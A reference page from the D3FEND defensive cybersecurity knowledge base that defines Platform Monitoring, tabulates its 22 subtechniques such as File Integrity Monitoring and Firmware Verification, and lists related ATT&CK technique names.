Esc
Platform Monitoring
Definition
Monitoring platform components such as operating systems software, hardware devices, or firmware.
Platform monitoring consists of the analysis and monitoring of system level devices and low-level components, including hardware devices, to detect unauthorized modifications or suspicious activity.
Monitored platform components includes system files and embedded devices such as:
- Kernel software modules
- Boot process code and load logic
- Operating system components and device files
- System libraries and dynamically loaded files
- Hardware device drivers
- Embedded firmware devices
Artifact Relationships:
This defensive technique is related to specific artifacts. Click the artifact node for more information.
Technique Subclasses
There are 22 techniques in this category, Platform Monitoring.
| Name | ID | Definition | Synonyms |
|---|---|---|---|
| Platform Monitoring | D3-PM | Monitoring platform components such as operating systems software, hardware devices, or firmware. | |
| - Application Performance Monitoring | D3-APM | Monitoring the count and duration of the application or program cycle. | |
| - File Integrity Monitoring | D3-FIM | Detecting any suspicious changes to files in a computer system. | |
| - Service Binary Verification | D3-SBV | Analyzing changes in service binary files by comparing to a source of truth. | |
| - User Session Init Config Analysis | D3-USICA | Analyzing modifications to user session config files such as .bashrc or .bash_profile. | User Startup Config Analysis |
| - Platform Uptime Monitoring | D3-PUM | Monitor the amount of time since the last power cycle or restart. | |
| - System Daemon Monitoring | D3-SDM | Tracking changes to the state or configuration of critical system level processes. | |
| - Operating Mode Monitoring | D3-OMM | Detects operating modes such as Program, Run, Remote, or Stop. | |
| - Application Exception Monitoring | D3-AEM | Monitoring the failures of system counters and timers. | Application Failure Monitoring |
| - Scheduled Job Analysis | D3-SJA | Analysis of source files, processes, destination files, or destination servers associated with a scheduled job to detect unauthorized use of job scheduling. | Scheduled Job Execution |
| - Peripheral Firmware Verification | D3-PFV | Cryptographically verifying peripheral firmware integrity. | |
| - Firmware Embedded Monitoring Code | D3-FEMC | Monitoring code is injected into firmware for integrity monitoring of firmware and firmware data. | |
| - Firmware Verification | D3-FV | Cryptographically verifying firmware integrity. | |
| - Operating System Monitoring | D3-OSM | The operating system software, for D3FEND's purposes, includes the kernel and its process management functions, hardware drivers, initialization or boot logic. It also includes and other key system daemons and their configuration. The monitoring or analysis of these components for unauthorized activity constitute **Operating System Monitoring**. | |
| - System File Analysis | D3-SFA | Monitoring system files such as authentication databases, configuration files, system logs, and system executables for modification or tampering. | |
| - System Firmware Verification | D3-SFV | Cryptographically verifying installed system firmware integrity. | |
| - Input Device Analysis | D3-IDA | Operating system level mechanisms to prevent abusive input device exploitation. | |
| - Memory Boundary Tracking | D3-MBT | Analyzing a call stack for return addresses which point to unexpected memory locations. | |
| - Operational Process Monitoring | D3-OPM | Monitoring physical parameters and operator actions related to an operational environment. | Supervisory Control Monitoring |
| - Firmware Behavior Analysis | D3-FBA | Analyzing the behavior of embedded code in firmware and looking for anomalous behavior and suspicious activity. | Firmware Timing Analysis |
| - Endpoint Health Beacon | D3-EHB | Monitoring the security status of an endpoint by sending periodic messages with health status, where absence of a response may indicate that the endpoint has been compromised. | Endpoint Health Telemetry |
| - System Init Config Analysis | D3-SICA | Analysis of any system process startup configuration. | Startup Analysis , and Autorun Analysis |
Related ATT&CK Techniques:
These mappings are inferred, experimental, and will improve as the
knowledge graph grows.
These offensive techniques are determined related because of the way this defensive technique,, , , and .
Lateral Movement
Software Deployment Tools
Exploitation of Remote Services
Internal Spearphishing
Privilege Escalation
Abuse Elevation Control Mechanism
Process Injection
Boot or Logon Initialization Scripts
Boot or Logon Autostart Execution
Exploitation for Privilege Escalation
Event Triggered Execution
Hijack Execution Flow
Create or Modify System Process
Scheduled Task/Job
Access Token Manipulation
Command And Control
Encrypted Channel
Application Layer Protocol
Impact
Data Encrypted for Impact
Data Manipulation
Collection
Audio Capture
Input Capture
Automated Collection
Video Capture
Data Staged
Archive Collected Data
Data from Local System
Email Collection
Discovery
System Network Configuration Discovery
Remote System Discovery
System Owner/User Discovery
File and Directory Discovery
Persistence
Boot or Logon Initialization Scripts
Office Application Startup
Boot or Logon Autostart Execution
Event Triggered Execution
Hijack Execution Flow
Server Software Component
Modify Authentication Process
Create or Modify System Process
Scheduled Task/Job
Pre-OS Boot
Execution
Exploitation for Client Execution
Software Deployment Tools
User Execution
Command and Scripting Interpreter
Scheduled Task/Job
Credential Access
Exploitation for Credential Access
Input Capture
Brute Force
Unsecured Credentials
Modify Authentication Process
OS Credential Dumping
Forced Authentication
Credentials from Password Stores
Steal or Forge Authentication Certificates
Defense Evasion
Abuse Elevation Control Mechanism
Indicator Removal
Masquerading
Process Injection
System Binary Proxy Execution
Obfuscated Files or Information
Hide Artifacts
Trusted Developer Utilities Proxy Execution
Hijack Execution Flow
Deobfuscate/Decode Files or Information
Modify Authentication Process
Modify Cloud Compute Infrastructure
Exploitation for Defense Evasion
Rootkit
Impair Defenses
Pre-OS Boot
Access Token Manipulation
XSL Script Processing
Exfiltration
Exfiltration Over C2 Channel
Exfiltration Over Alternative Protocol